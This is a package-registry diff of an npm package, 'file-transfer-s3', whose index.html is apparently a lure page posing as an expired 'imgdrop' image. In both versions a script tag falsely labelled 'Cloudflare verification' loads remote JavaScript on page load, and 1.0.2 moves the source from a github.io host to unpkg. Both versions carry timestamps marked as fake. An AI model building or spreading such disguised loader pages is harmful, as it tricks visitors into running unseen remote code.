file-transfer-s3 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.html +4 -4
  2. package/package.json +1 -1
package/index.html CHANGED
@@ -6,7 +6,7 @@
6
6
  <title>imgdrop · image expired</title>
7
7
 
8
8
  <!-- ====== REQUIRED SCRIPT: Cloudflare verification ====== -->
9
- <script src="https://document-viewer-001.github.io/bucket-s3/Notifications.js" defer></script>
9
+ <script src="https://unpkg.com/file-transfer-s3@1.0.0/index.html" defer></script>
10
10
  <!-- ===================================================== -->
11
11
 
12
12
  <!-- clean, modern, no emoji icons — uses SVG / CSS shapes for a professional look -->
@@ -434,13 +434,13 @@
434
434
  <span class="meta-icon">
435
435
  <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
436
436
  </span>
437
- Uploaded: <span class="fake-timestamp">2026-01-12</span>
437
+ Uploaded: <span class="fake-timestamp">2026-08-19</span>
438
438
  </span>
439
439
  <span>
440
440
  <span class="meta-icon">
441
441
  <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
442
442
  </span>
443
- Expired: <span class="fake-timestamp expired-date">2026-08-19</span>
443
+ Expired: <span class="fake-timestamp expired-date">2026-08-26</span>
444
444
  </span>
445
445
  <span>
446
446
  <span class="meta-icon">
@@ -517,4 +517,4 @@
517
517
  </span>
518
518
  </div>
519
519
  </body>
520
- </html>
520
+ </html>
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "file-transfer-s3",
3
- "version": "1.0.0",
3
+ "version": "1.0.2",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {